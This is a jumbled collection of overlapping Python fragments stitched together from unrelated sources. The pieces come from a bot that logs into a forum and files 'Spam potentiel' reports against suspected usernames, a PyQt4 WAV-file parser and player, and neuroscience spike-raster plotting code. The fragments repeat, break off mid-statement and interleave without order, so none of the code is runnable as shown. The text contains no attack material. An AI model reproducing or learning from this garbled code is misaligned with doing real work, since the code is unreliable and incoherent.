login_page_soup.find(\"form\", action=login_form_url) for el", "profile_page_req = s.get(website+profile_page_url+username) profile_page_req.raise_for_status() referer = profile_page_req.url profile_page_soup = BeautifulSoup(profile_page_req.content, \"lxml\") profile_form =", "el in login_form.find_all(name=True): if \"name\" in el.attrs: if not el.attrs.get(\"name\") in login_form_data: login_form_data[el.attrs.get(\"name\")]", "login_form_data = { \"username\": bot_username, \"password\": <PASSWORD>, } profile_page_url = \"/@\" profile_form_id =", "suspected_usernames: s.headers.update({\"referer\": referer}) profile_page_req = s.get(website+profile_page_url+username) profile_page_req.raise_for_status() referer = profile_page_req.url profile_page_soup = BeautifulSoup(profile_page_req.content,", "login_form = login_page_soup.find(\"form\", action=login_form_url) for el in login_form.find_all(name=True): if \"name\" in el.attrs: if", "= BeautifulSoup(profile_page_req.content, \"lxml\") profile_form = profile_page_soup.find(\"form\", id=profile_form_id) profile_form_url = profile_form.attrs.get(\"action\") for el in", "not el.attrs.get(\"name\") in login_form_data: login_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\": referer}) login_auth_req = s.post(website+login_form_url, data=login_form_data)", "s.get(website+login_page_url) login_page_req.raise_for_status() referer = login_page_req.url login_page_soup = BeautifulSoup(login_page_req.content, \"lxml\") login_form = login_page_soup.find(\"form\", action=login_form_url)", "login_auth_req = s.post(website+login_form_url, data=login_form_data) login_auth_req.raise_for_status() referer = login_auth_req.url # Sending alerts for username", "login_form_url = \"/membres/connexion/?next=/\" login_form_data = { \"username\": bot_username, \"password\": <PASSWORD>, } profile_page_url =", "profile_form.find_all(name=True): if \"name\" in el.attrs: if not el.attrs.get(\"name\") in profile_form_data: profile_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\")", "BeautifulSoup(profile_page_req.content, \"lxml\") profile_form = profile_page_soup.find(\"form\", id=profile_form_id) profile_form_url = profile_form.attrs.get(\"action\") for el in profile_form.find_all(name=True):", "\"name\" in el.attrs: if not el.attrs.get(\"name\") in profile_form_data: profile_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\": referer})", "suspected_usernames): login_page_url = \"/membres/connexion/\" login_form_url = \"/membres/connexion/?next=/\" login_form_data = { \"username\": bot_username, \"password\":", "\"name\" in el.attrs: if not el.attrs.get(\"name\") in login_form_data: login_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\": referer})", "profile_form.attrs.get(\"action\") for el in profile_form.find_all(name=True): if \"name\" in el.attrs: if not el.attrs.get(\"name\") in", "profile_form_data = { \"reason\": \"Spam potentiel\" } s = requests.session() # Bot login", "el.attrs.get(\"name\") in profile_form_data: profile_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\": referer}) profile_alert_req = s.post(website+profile_form_url, data=profile_form_data) profile_alert_req.raise_for_status()", "\"/membres/connexion/\" login_form_url = \"/membres/connexion/?next=/\" login_form_data = { \"username\": bot_username, \"password\": <PASSWORD>, } profile_page_url", "\"password\": <PASSWORD>, } profile_page_url = \"/@\" profile_form_id = \"report-profile\" profile_form_data = { \"reason\":", "\"report-profile\" profile_form_data = { \"reason\": \"Spam potentiel\" } s = requests.session() # Bot", "= BeautifulSoup(login_page_req.content, \"lxml\") login_form = login_page_soup.find(\"form\", action=login_form_url) for el in login_form.find_all(name=True): if \"name\"", "profile_page_soup.find(\"form\", id=profile_form_id) profile_form_url = profile_form.attrs.get(\"action\") for el in profile_form.find_all(name=True): if \"name\" in el.attrs:", "profile_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\": referer}) profile_alert_req = s.post(website+profile_form_url, data=profile_form_data) profile_alert_req.raise_for_status() referer = profile_alert_req.url", "<PASSWORD>, } profile_page_url = \"/@\" profile_form_id = \"report-profile\" profile_form_data = { \"reason\": \"Spam" ]
[ "struct.unpack('<h', fh.read(2))[0] == 1, 'This is not a PCM wave file, not supported'", "class QtWavSong(Song): def __init__(self, path): super(QtWavSong, self).__init__(path) # parse the file header #", "data is UInt8 or Int16 format.setSampleType({8: QAudioFormat.UnSignedInt, 16: QAudioFormat.SignedInt}[bitsPerSample]) # ensure we can", "file, not supported' numChannels = struct.unpack('<h', fh.read(2))[0] sampleRate = struct.unpack('<i', fh.read(4))[0] fh.read(4) #", "not supported' assert struct.unpack('<h', fh.read(2))[0] == 1, 'This is not a PCM wave", "', 'This is not a wave file' assert struct.unpack('<i', fh.read(4))[0] == 16, 'This", "store info for seeking self.chunkSize = numChannels * bitsPerSample / 8 self.sampleRate =", "bitsPerSample = struct.unpack('<h', fh.read(2))[0] assert bitsPerSample in (8, 16) assert fh.read(4) == 'data',", "QAudioOutput(format, None) self.audioFile = QFile(path) self.audioFile.open(QIODevice.ReadOnly) self.output.start(self.audioFile) def seekAndPlay(self, seconds): self.audioFile.seek(int(seconds * self.sampleRate)", "a PCM wave file, not supported' numChannels = struct.unpack('<h', fh.read(2))[0] sampleRate = struct.unpack('<i',", "== 16, 'This is not a PCM wave file, not supported' assert struct.unpack('<h',", "format.setByteOrder(QAudioFormat.LittleEndian) # According to the wave format spec the bitsPerSample determins if data", "fh.read(4) == 'WAVE', 'This is not a wave file' assert fh.read(4) == 'fmt", "file size in bytes, ignore assert fh.read(4) == 'WAVE', 'This is not a", "with open(path, 'rb') as fh: assert fh.read(4) == 'RIFF', 'This is not a", "file' assert struct.unpack('<i', fh.read(4))[0] == 16, 'This is not a PCM wave file,", "== 'fmt ', 'This is not a wave file' assert struct.unpack('<i', fh.read(4))[0] ==", "PCM wave file header.' fh.read(4) # sample data size self.waveDataOffset = fh.tell() #", "struct.unpack('<i', fh.read(4))[0] fh.read(4) # byteRate fh.read(2) # blockAlign bitsPerSample = struct.unpack('<h', fh.read(2))[0] assert", "format spec the bitsPerSample determins if data is UInt8 or Int16 format.setSampleType({8: QAudioFormat.UnSignedInt,", "the file header # http://soundfile.sapp.org/doc/WaveFormat/ with open(path, 'rb') as fh: assert fh.read(4) ==", "as fh: assert fh.read(4) == 'RIFF', 'This is not a wave file' fh.read(4)", "# According to the wave format spec the bitsPerSample determins if data is", "not a PCM wave file, not supported' assert struct.unpack('<h', fh.read(2))[0] == 1, 'This", "def seekAndPlay(self, seconds): self.audioFile.seek(int(seconds * self.sampleRate) * self.chunkSize + self.waveDataOffset) self.output.start(self.audioFile) def stop(self):", "= QAudioFormat() format.setSampleRate(sampleRate) format.setChannels(numChannels) format.setSampleSize(bitsPerSample) format.setCodec(\"audio/pcm\") format.setByteOrder(QAudioFormat.LittleEndian) # According to the wave format", "According to the wave format spec the bitsPerSample determins if data is UInt8", "seekAndPlay(self, seconds): self.audioFile.seek(int(seconds * self.sampleRate) * self.chunkSize + self.waveDataOffset) self.output.start(self.audioFile) def stop(self): self.output.stop()", "self).__init__(path) # parse the file header # http://soundfile.sapp.org/doc/WaveFormat/ with open(path, 'rb') as fh:", "struct.unpack('<h', fh.read(2))[0] assert bitsPerSample in (8, 16) assert fh.read(4) == 'data', 'Additional bytes", "= struct.unpack('<i', fh.read(4))[0] fh.read(4) # byteRate fh.read(2) # blockAlign bitsPerSample = struct.unpack('<h', fh.read(2))[0]", "struct class QtWavSong(Song): def __init__(self, path): super(QtWavSong, self).__init__(path) # parse the file header", "this data device = QAudioDeviceInfo.defaultOutputDevice() assert device.isFormatSupported(format) self.output = QAudioOutput(format, None) self.audioFile =", "size self.waveDataOffset = fh.tell() # sample data start # store info for seeking", "import * from audioLibs.base import Song from PyQt4.QtMultimedia import * import struct class", "determins if data is UInt8 or Int16 format.setSampleType({8: QAudioFormat.UnSignedInt, 16: QAudioFormat.SignedInt}[bitsPerSample]) # ensure", "fh.read(4))[0] == 16, 'This is not a PCM wave file, not supported' assert", "import Song from PyQt4.QtMultimedia import * import struct class QtWavSong(Song): def __init__(self, path):", "import struct class QtWavSong(Song): def __init__(self, path): super(QtWavSong, self).__init__(path) # parse the file", "== 'RIFF', 'This is not a wave file' fh.read(4) # file size in", "a wave file' assert fh.read(4) == 'fmt ', 'This is not a wave", "wave file, not supported' numChannels = struct.unpack('<h', fh.read(2))[0] sampleRate = struct.unpack('<i', fh.read(4))[0] fh.read(4)", "16) assert fh.read(4) == 'data', 'Additional bytes found in PCM wave file header.'", "self.sampleRate = sampleRate # convert to format format = QAudioFormat() format.setSampleRate(sampleRate) format.setChannels(numChannels) format.setSampleSize(bitsPerSample)", "not supported' numChannels = struct.unpack('<h', fh.read(2))[0] sampleRate = struct.unpack('<i', fh.read(4))[0] fh.read(4) # byteRate", "a PCM wave file, not supported' assert struct.unpack('<h', fh.read(2))[0] == 1, 'This is", "fh.read(4))[0] fh.read(4) # byteRate fh.read(2) # blockAlign bitsPerSample = struct.unpack('<h', fh.read(2))[0] assert bitsPerSample", "the bitsPerSample determins if data is UInt8 or Int16 format.setSampleType({8: QAudioFormat.UnSignedInt, 16: QAudioFormat.SignedInt}[bitsPerSample])", "from PyQt4.QtMultimedia import * import struct class QtWavSong(Song): def __init__(self, path): super(QtWavSong, self).__init__(path)", "format.setCodec(\"audio/pcm\") format.setByteOrder(QAudioFormat.LittleEndian) # According to the wave format spec the bitsPerSample determins if", "* bitsPerSample / 8 self.sampleRate = sampleRate # convert to format format =", "in (8, 16) assert fh.read(4) == 'data', 'Additional bytes found in PCM wave", "bytes, ignore assert fh.read(4) == 'WAVE', 'This is not a wave file' assert", "__init__(self, path): super(QtWavSong, self).__init__(path) # parse the file header # http://soundfile.sapp.org/doc/WaveFormat/ with open(path,", "not a wave file' assert struct.unpack('<i', fh.read(4))[0] == 16, 'This is not a", "data start # store info for seeking self.chunkSize = numChannels * bitsPerSample /", "16: QAudioFormat.SignedInt}[bitsPerSample]) # ensure we can play this data device = QAudioDeviceInfo.defaultOutputDevice() assert", "# byteRate fh.read(2) # blockAlign bitsPerSample = struct.unpack('<h', fh.read(2))[0] assert bitsPerSample in (8,", "assert fh.read(4) == 'data', 'Additional bytes found in PCM wave file header.' fh.read(4)", "data size self.waveDataOffset = fh.tell() # sample data start # store info for", "QFile(path) self.audioFile.open(QIODevice.ReadOnly) self.output.start(self.audioFile) def seekAndPlay(self, seconds): self.audioFile.seek(int(seconds * self.sampleRate) * self.chunkSize + self.waveDataOffset)", "QAudioFormat.SignedInt}[bitsPerSample]) # ensure we can play this data device = QAudioDeviceInfo.defaultOutputDevice() assert device.isFormatSupported(format)", "or Int16 format.setSampleType({8: QAudioFormat.UnSignedInt, 16: QAudioFormat.SignedInt}[bitsPerSample]) # ensure we can play this data", "http://soundfile.sapp.org/doc/WaveFormat/ with open(path, 'rb') as fh: assert fh.read(4) == 'RIFF', 'This is not", "is not a PCM wave file, not supported' assert struct.unpack('<h', fh.read(2))[0] == 1,", "fh.tell() # sample data start # store info for seeking self.chunkSize = numChannels", "Song from PyQt4.QtMultimedia import * import struct class QtWavSong(Song): def __init__(self, path): super(QtWavSong,", "supported' numChannels = struct.unpack('<h', fh.read(2))[0] sampleRate = struct.unpack('<i', fh.read(4))[0] fh.read(4) # byteRate fh.read(2)", "byteRate fh.read(2) # blockAlign bitsPerSample = struct.unpack('<h', fh.read(2))[0] assert bitsPerSample in (8, 16)", "wave file' fh.read(4) # file size in bytes, ignore assert fh.read(4) == 'WAVE',", "= struct.unpack('<h', fh.read(2))[0] sampleRate = struct.unpack('<i', fh.read(4))[0] fh.read(4) # byteRate fh.read(2) # blockAlign", "* from audioLibs.base import Song from PyQt4.QtMultimedia import * import struct class QtWavSong(Song):", "fh.read(4) == 'fmt ', 'This is not a wave file' assert struct.unpack('<i', fh.read(4))[0]", "file header.' fh.read(4) # sample data size self.waveDataOffset = fh.tell() # sample data", "format.setSampleRate(sampleRate) format.setChannels(numChannels) format.setSampleSize(bitsPerSample) format.setCodec(\"audio/pcm\") format.setByteOrder(QAudioFormat.LittleEndian) # According to the wave format spec the", "to the wave format spec the bitsPerSample determins if data is UInt8 or", "None) self.audioFile = QFile(path) self.audioFile.open(QIODevice.ReadOnly) self.output.start(self.audioFile) def seekAndPlay(self, seconds): self.audioFile.seek(int(seconds * self.sampleRate) *", "numChannels = struct.unpack('<h', fh.read(2))[0] sampleRate = struct.unpack('<i', fh.read(4))[0] fh.read(4) # byteRate fh.read(2) #", "sampleRate = struct.unpack('<i', fh.read(4))[0] fh.read(4) # byteRate fh.read(2) # blockAlign bitsPerSample = struct.unpack('<h',", "open(path, 'rb') as fh: assert fh.read(4) == 'RIFF', 'This is not a wave", "self.audioFile.open(QIODevice.ReadOnly) self.output.start(self.audioFile) def seekAndPlay(self, seconds): self.audioFile.seek(int(seconds * self.sampleRate) * self.chunkSize + self.waveDataOffset) self.output.start(self.audioFile)", "self.output.start(self.audioFile) def seekAndPlay(self, seconds): self.audioFile.seek(int(seconds * self.sampleRate) * self.chunkSize + self.waveDataOffset) self.output.start(self.audioFile) def", "audioLibs.base import Song from PyQt4.QtMultimedia import * import struct class QtWavSong(Song): def __init__(self,", "Int16 format.setSampleType({8: QAudioFormat.UnSignedInt, 16: QAudioFormat.SignedInt}[bitsPerSample]) # ensure we can play this data device", "the wave format spec the bitsPerSample determins if data is UInt8 or Int16", "blockAlign bitsPerSample = struct.unpack('<h', fh.read(2))[0] assert bitsPerSample in (8, 16) assert fh.read(4) ==", "if data is UInt8 or Int16 format.setSampleType({8: QAudioFormat.UnSignedInt, 16: QAudioFormat.SignedInt}[bitsPerSample]) # ensure we", "assert device.isFormatSupported(format) self.output = QAudioOutput(format, None) self.audioFile = QFile(path) self.audioFile.open(QIODevice.ReadOnly) self.output.start(self.audioFile) def seekAndPlay(self,", "format.setSampleType({8: QAudioFormat.UnSignedInt, 16: QAudioFormat.SignedInt}[bitsPerSample]) # ensure we can play this data device =", "= QAudioDeviceInfo.defaultOutputDevice() assert device.isFormatSupported(format) self.output = QAudioOutput(format, None) self.audioFile = QFile(path) self.audioFile.open(QIODevice.ReadOnly) self.output.start(self.audioFile)", "assert struct.unpack('<i', fh.read(4))[0] == 16, 'This is not a PCM wave file, not", "wave file' assert struct.unpack('<i', fh.read(4))[0] == 16, 'This is not a PCM wave", "file' fh.read(4) # file size in bytes, ignore assert fh.read(4) == 'WAVE', 'This", "'WAVE', 'This is not a wave file' assert fh.read(4) == 'fmt ', 'This", "from qtutil import * from audioLibs.base import Song from PyQt4.QtMultimedia import * import", "wave file header.' fh.read(4) # sample data size self.waveDataOffset = fh.tell() # sample", "is not a wave file' fh.read(4) # file size in bytes, ignore assert", "device.isFormatSupported(format) self.output = QAudioOutput(format, None) self.audioFile = QFile(path) self.audioFile.open(QIODevice.ReadOnly) self.output.start(self.audioFile) def seekAndPlay(self, seconds):", "import * import struct class QtWavSong(Song): def __init__(self, path): super(QtWavSong, self).__init__(path) # parse", "= QFile(path) self.audioFile.open(QIODevice.ReadOnly) self.output.start(self.audioFile) def seekAndPlay(self, seconds): self.audioFile.seek(int(seconds * self.sampleRate) * self.chunkSize +", "= struct.unpack('<h', fh.read(2))[0] assert bitsPerSample in (8, 16) assert fh.read(4) == 'data', 'Additional", "UInt8 or Int16 format.setSampleType({8: QAudioFormat.UnSignedInt, 16: QAudioFormat.SignedInt}[bitsPerSample]) # ensure we can play this", "struct.unpack('<h', fh.read(2))[0] sampleRate = struct.unpack('<i', fh.read(4))[0] fh.read(4) # byteRate fh.read(2) # blockAlign bitsPerSample", "device = QAudioDeviceInfo.defaultOutputDevice() assert device.isFormatSupported(format) self.output = QAudioOutput(format, None) self.audioFile = QFile(path) self.audioFile.open(QIODevice.ReadOnly)", "convert to format format = QAudioFormat() format.setSampleRate(sampleRate) format.setChannels(numChannels) format.setSampleSize(bitsPerSample) format.setCodec(\"audio/pcm\") format.setByteOrder(QAudioFormat.LittleEndian) # According", "= QAudioOutput(format, None) self.audioFile = QFile(path) self.audioFile.open(QIODevice.ReadOnly) self.output.start(self.audioFile) def seekAndPlay(self, seconds): self.audioFile.seek(int(seconds *", "fh.read(4) == 'data', 'Additional bytes found in PCM wave file header.' fh.read(4) #", "assert bitsPerSample in (8, 16) assert fh.read(4) == 'data', 'Additional bytes found in", "is UInt8 or Int16 format.setSampleType({8: QAudioFormat.UnSignedInt, 16: QAudioFormat.SignedInt}[bitsPerSample]) # ensure we can play", "in bytes, ignore assert fh.read(4) == 'WAVE', 'This is not a wave file'", "'This is not a PCM wave file, not supported' numChannels = struct.unpack('<h', fh.read(2))[0]", "found in PCM wave file header.' fh.read(4) # sample data size self.waveDataOffset =", "assert fh.read(4) == 'WAVE', 'This is not a wave file' assert fh.read(4) ==", "not a PCM wave file, not supported' numChannels = struct.unpack('<h', fh.read(2))[0] sampleRate =", "self.audioFile = QFile(path) self.audioFile.open(QIODevice.ReadOnly) self.output.start(self.audioFile) def seekAndPlay(self, seconds): self.audioFile.seek(int(seconds * self.sampleRate) * self.chunkSize", "'data', 'Additional bytes found in PCM wave file header.' fh.read(4) # sample data", "wave file, not supported' assert struct.unpack('<h', fh.read(2))[0] == 1, 'This is not a", "sampleRate # convert to format format = QAudioFormat() format.setSampleRate(sampleRate) format.setChannels(numChannels) format.setSampleSize(bitsPerSample) format.setCodec(\"audio/pcm\") format.setByteOrder(QAudioFormat.LittleEndian)", "# convert to format format = QAudioFormat() format.setSampleRate(sampleRate) format.setChannels(numChannels) format.setSampleSize(bitsPerSample) format.setCodec(\"audio/pcm\") format.setByteOrder(QAudioFormat.LittleEndian) #", "= numChannels * bitsPerSample / 8 self.sampleRate = sampleRate # convert to format", "/ 8 self.sampleRate = sampleRate # convert to format format = QAudioFormat() format.setSampleRate(sampleRate)", "(8, 16) assert fh.read(4) == 'data', 'Additional bytes found in PCM wave file", "bitsPerSample determins if data is UInt8 or Int16 format.setSampleType({8: QAudioFormat.UnSignedInt, 16: QAudioFormat.SignedInt}[bitsPerSample]) #", "# http://soundfile.sapp.org/doc/WaveFormat/ with open(path, 'rb') as fh: assert fh.read(4) == 'RIFF', 'This is", "size in bytes, ignore assert fh.read(4) == 'WAVE', 'This is not a wave", "'This is not a wave file' assert struct.unpack('<i', fh.read(4))[0] == 16, 'This is", "seeking self.chunkSize = numChannels * bitsPerSample / 8 self.sampleRate = sampleRate # convert", "= sampleRate # convert to format format = QAudioFormat() format.setSampleRate(sampleRate) format.setChannels(numChannels) format.setSampleSize(bitsPerSample) format.setCodec(\"audio/pcm\")", "a wave file' fh.read(4) # file size in bytes, ignore assert fh.read(4) ==", "fh.read(4) == 'RIFF', 'This is not a wave file' fh.read(4) # file size", "file header # http://soundfile.sapp.org/doc/WaveFormat/ with open(path, 'rb') as fh: assert fh.read(4) == 'RIFF',", "format.setSampleSize(bitsPerSample) format.setCodec(\"audio/pcm\") format.setByteOrder(QAudioFormat.LittleEndian) # According to the wave format spec the bitsPerSample determins", "wave format spec the bitsPerSample determins if data is UInt8 or Int16 format.setSampleType({8:", "is not a wave file' assert struct.unpack('<i', fh.read(4))[0] == 16, 'This is not", "assert fh.read(4) == 'fmt ', 'This is not a wave file' assert struct.unpack('<i',", "# file size in bytes, ignore assert fh.read(4) == 'WAVE', 'This is not", "* import struct class QtWavSong(Song): def __init__(self, path): super(QtWavSong, self).__init__(path) # parse the", "qtutil import * from audioLibs.base import Song from PyQt4.QtMultimedia import * import struct", "8 self.sampleRate = sampleRate # convert to format format = QAudioFormat() format.setSampleRate(sampleRate) format.setChannels(numChannels)", "to format format = QAudioFormat() format.setSampleRate(sampleRate) format.setChannels(numChannels) format.setSampleSize(bitsPerSample) format.setCodec(\"audio/pcm\") format.setByteOrder(QAudioFormat.LittleEndian) # According to", "not a wave file' assert fh.read(4) == 'fmt ', 'This is not a", "PyQt4.QtMultimedia import * import struct class QtWavSong(Song): def __init__(self, path): super(QtWavSong, self).__init__(path) #", "'This is not a wave file' assert fh.read(4) == 'fmt ', 'This is", "can play this data device = QAudioDeviceInfo.defaultOutputDevice() assert device.isFormatSupported(format) self.output = QAudioOutput(format, None)", "== 1, 'This is not a PCM wave file, not supported' numChannels =", "format format = QAudioFormat() format.setSampleRate(sampleRate) format.setChannels(numChannels) format.setSampleSize(bitsPerSample) format.setCodec(\"audio/pcm\") format.setByteOrder(QAudioFormat.LittleEndian) # According to the", "wave file' assert fh.read(4) == 'fmt ', 'This is not a wave file'", "fh.read(4) # file size in bytes, ignore assert fh.read(4) == 'WAVE', 'This is", "'RIFF', 'This is not a wave file' fh.read(4) # file size in bytes,", "not a wave file' fh.read(4) # file size in bytes, ignore assert fh.read(4)", "'This is not a wave file' fh.read(4) # file size in bytes, ignore", "struct.unpack('<i', fh.read(4))[0] == 16, 'This is not a PCM wave file, not supported'", "info for seeking self.chunkSize = numChannels * bitsPerSample / 8 self.sampleRate = sampleRate", "self.chunkSize = numChannels * bitsPerSample / 8 self.sampleRate = sampleRate # convert to", "== 'WAVE', 'This is not a wave file' assert fh.read(4) == 'fmt ',", "format.setChannels(numChannels) format.setSampleSize(bitsPerSample) format.setCodec(\"audio/pcm\") format.setByteOrder(QAudioFormat.LittleEndian) # According to the wave format spec the bitsPerSample", "bitsPerSample in (8, 16) assert fh.read(4) == 'data', 'Additional bytes found in PCM", "PCM wave file, not supported' numChannels = struct.unpack('<h', fh.read(2))[0] sampleRate = struct.unpack('<i', fh.read(4))[0]", "for seeking self.chunkSize = numChannels * bitsPerSample / 8 self.sampleRate = sampleRate #", "# blockAlign bitsPerSample = struct.unpack('<h', fh.read(2))[0] assert bitsPerSample in (8, 16) assert fh.read(4)", "is not a PCM wave file, not supported' numChannels = struct.unpack('<h', fh.read(2))[0] sampleRate", "numChannels * bitsPerSample / 8 self.sampleRate = sampleRate # convert to format format", "file' assert fh.read(4) == 'fmt ', 'This is not a wave file' assert", "fh.read(2))[0] sampleRate = struct.unpack('<i', fh.read(4))[0] fh.read(4) # byteRate fh.read(2) # blockAlign bitsPerSample =", "'This is not a PCM wave file, not supported' assert struct.unpack('<h', fh.read(2))[0] ==", "assert fh.read(4) == 'RIFF', 'This is not a wave file' fh.read(4) # file", "1, 'This is not a PCM wave file, not supported' numChannels = struct.unpack('<h',", "sample data start # store info for seeking self.chunkSize = numChannels * bitsPerSample", "format = QAudioFormat() format.setSampleRate(sampleRate) format.setChannels(numChannels) format.setSampleSize(bitsPerSample) format.setCodec(\"audio/pcm\") format.setByteOrder(QAudioFormat.LittleEndian) # According to the wave", "file, not supported' assert struct.unpack('<h', fh.read(2))[0] == 1, 'This is not a PCM", "QtWavSong(Song): def __init__(self, path): super(QtWavSong, self).__init__(path) # parse the file header # http://soundfile.sapp.org/doc/WaveFormat/", "16, 'This is not a PCM wave file, not supported' assert struct.unpack('<h', fh.read(2))[0]", "= fh.tell() # sample data start # store info for seeking self.chunkSize =", "spec the bitsPerSample determins if data is UInt8 or Int16 format.setSampleType({8: QAudioFormat.UnSignedInt, 16:", "ignore assert fh.read(4) == 'WAVE', 'This is not a wave file' assert fh.read(4)", "== 'data', 'Additional bytes found in PCM wave file header.' fh.read(4) # sample", "bytes found in PCM wave file header.' fh.read(4) # sample data size self.waveDataOffset", "# parse the file header # http://soundfile.sapp.org/doc/WaveFormat/ with open(path, 'rb') as fh: assert", "fh.read(2))[0] == 1, 'This is not a PCM wave file, not supported' numChannels", "# sample data size self.waveDataOffset = fh.tell() # sample data start # store", "fh: assert fh.read(4) == 'RIFF', 'This is not a wave file' fh.read(4) #", "'rb') as fh: assert fh.read(4) == 'RIFF', 'This is not a wave file'", "a wave file' assert struct.unpack('<i', fh.read(4))[0] == 16, 'This is not a PCM", "super(QtWavSong, self).__init__(path) # parse the file header # http://soundfile.sapp.org/doc/WaveFormat/ with open(path, 'rb') as", "'Additional bytes found in PCM wave file header.' fh.read(4) # sample data size", "# store info for seeking self.chunkSize = numChannels * bitsPerSample / 8 self.sampleRate", "fh.read(4) # byteRate fh.read(2) # blockAlign bitsPerSample = struct.unpack('<h', fh.read(2))[0] assert bitsPerSample in", "is not a wave file' assert fh.read(4) == 'fmt ', 'This is not", "play this data device = QAudioDeviceInfo.defaultOutputDevice() assert device.isFormatSupported(format) self.output = QAudioOutput(format, None) self.audioFile", "fh.read(4) # sample data size self.waveDataOffset = fh.tell() # sample data start #", "header.' fh.read(4) # sample data size self.waveDataOffset = fh.tell() # sample data start", "self.waveDataOffset = fh.tell() # sample data start # store info for seeking self.chunkSize", "parse the file header # http://soundfile.sapp.org/doc/WaveFormat/ with open(path, 'rb') as fh: assert fh.read(4)", "QAudioFormat() format.setSampleRate(sampleRate) format.setChannels(numChannels) format.setSampleSize(bitsPerSample) format.setCodec(\"audio/pcm\") format.setByteOrder(QAudioFormat.LittleEndian) # According to the wave format spec", "fh.read(2))[0] assert bitsPerSample in (8, 16) assert fh.read(4) == 'data', 'Additional bytes found", "self.output = QAudioOutput(format, None) self.audioFile = QFile(path) self.audioFile.open(QIODevice.ReadOnly) self.output.start(self.audioFile) def seekAndPlay(self, seconds): self.audioFile.seek(int(seconds", "fh.read(2) # blockAlign bitsPerSample = struct.unpack('<h', fh.read(2))[0] assert bitsPerSample in (8, 16) assert", "start # store info for seeking self.chunkSize = numChannels * bitsPerSample / 8", "ensure we can play this data device = QAudioDeviceInfo.defaultOutputDevice() assert device.isFormatSupported(format) self.output =", "from audioLibs.base import Song from PyQt4.QtMultimedia import * import struct class QtWavSong(Song): def", "PCM wave file, not supported' assert struct.unpack('<h', fh.read(2))[0] == 1, 'This is not", "QAudioFormat.UnSignedInt, 16: QAudioFormat.SignedInt}[bitsPerSample]) # ensure we can play this data device = QAudioDeviceInfo.defaultOutputDevice()", "'fmt ', 'This is not a wave file' assert struct.unpack('<i', fh.read(4))[0] == 16,", "sample data size self.waveDataOffset = fh.tell() # sample data start # store info", "path): super(QtWavSong, self).__init__(path) # parse the file header # http://soundfile.sapp.org/doc/WaveFormat/ with open(path, 'rb')", "QAudioDeviceInfo.defaultOutputDevice() assert device.isFormatSupported(format) self.output = QAudioOutput(format, None) self.audioFile = QFile(path) self.audioFile.open(QIODevice.ReadOnly) self.output.start(self.audioFile) def", "we can play this data device = QAudioDeviceInfo.defaultOutputDevice() assert device.isFormatSupported(format) self.output = QAudioOutput(format,", "in PCM wave file header.' fh.read(4) # sample data size self.waveDataOffset = fh.tell()", "data device = QAudioDeviceInfo.defaultOutputDevice() assert device.isFormatSupported(format) self.output = QAudioOutput(format, None) self.audioFile = QFile(path)", "supported' assert struct.unpack('<h', fh.read(2))[0] == 1, 'This is not a PCM wave file,", "def __init__(self, path): super(QtWavSong, self).__init__(path) # parse the file header # http://soundfile.sapp.org/doc/WaveFormat/ with", "assert struct.unpack('<h', fh.read(2))[0] == 1, 'This is not a PCM wave file, not", "# sample data start # store info for seeking self.chunkSize = numChannels *", "bitsPerSample / 8 self.sampleRate = sampleRate # convert to format format = QAudioFormat()", "# ensure we can play this data device = QAudioDeviceInfo.defaultOutputDevice() assert device.isFormatSupported(format) self.output", "header # http://soundfile.sapp.org/doc/WaveFormat/ with open(path, 'rb') as fh: assert fh.read(4) == 'RIFF', 'This" ]
[ "dtype=int)) ax.set_xlabel('lag (ms)') ax.set_ylim(ylim) ax.set_ylabel('Synchronization magnitude') def draw_cell(cellid, ax, color='black'): xloc = 10+cellid*20", "import * from neuronpy.util import spiketrain from params import sim_var homedir = os.path.join(os.path.relpath('..'))", "= [10,30,50,70,90] ax.set_xticks(xticks) ax.set_xticklabels(numpy.multiply(xticks,10)) ax.set_xlabel('distance in microns') ax.set_ylim((-5,11)) ax.spines['left'].set_color('none') ax.spines['right'].set_color('none') ax.set_yticks([]) ax.spines['top'].set_color('none') ax.spines['bottom'].set_color('black')", "\\ bbox_to_anchor=(0, 1.15, 1., .102), loc=1, ncol=3, mode=\"expand\", \\ borderaxespad=0., handletextpad=.2) # Mark", "(10+pair[0]*20, cluster_width, 1, pair) # pos2 = (10+pair[1]*20, cluster_width, 1, pair) # stim_odor_mags", "1, pair) # stim_odor_mags = numpy.ones(5)*.55 fig = pyplot.figure(figsize=(9.5,5.7)) raster_ax = fig.add_axes([.1,.1,.8,.27]) schematic_ax", ".5), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(breath_events[i]+7.5, .28, \\ 'delay 0-15 ms',", "def draw_cell(cellid, ax, color='black'): xloc = 10+cellid*20 # Lateral dends y = numpy.abs(numpy.subtract(range(101),", "'A)', transform=fig.transFigure, verticalalignment='baseline') pos = syn_ax.get_position() syn_ax.text(.025, pos.ymax+.07, 'B)', transform=fig.transFigure, verticalalignment='baseline') pos =", "breathplt = syn_ax.plot([breath, breath], [0,2], linestyle='--', \\ color='gray', linewidth=2) syn_ax.set_xlim(xlim) syn_ax.set_ylim(0,1.6) syn_ax.set_yticks([]) syn_ax.set_xticks([])", "color='blue') idx += 1 raster_ax.text(2000,cluster_width*2+8.5, '(synchronized)', color='purple', \\ horizontalalignment='center', verticalalignment='center', fontsize=11) raster_ax.set_yticks([]) ylim", "ax.set_yticks([]) ax.spines['top'].set_color('none') ax.spines['bottom'].set_color('black') ax.xaxis.set_ticks_position('bottom') def read_weightevents(): M = numpy.loadtxt(os.path.join(analysis_path, 'stimweightevents.txt')) data = []", "schematic_ax, color='black') # Analyze an output file in some_dir bulb_spikes = BulbSpikes(sim_time=sim_var['tstop']) bulb_spikes.read_file(os.path.join(homedir,'spikeout.spk'))", "ax.spines['left'].set_color('none') ax.spines['right'].set_color('none') ax.set_yticks([]) ax.spines['top'].set_color('none') ax.spines['bottom'].set_color('black') ax.xaxis.set_ticks_position('bottom') def read_weightevents(): M = numpy.loadtxt(os.path.join(analysis_path, 'stimweightevents.txt')) data", "(ms)') ax.set_ylim(ylim) ax.set_ylabel('Synchronization magnitude') def draw_cell(cellid, ax, color='black'): xloc = 10+cellid*20 # Lateral", "y1 = 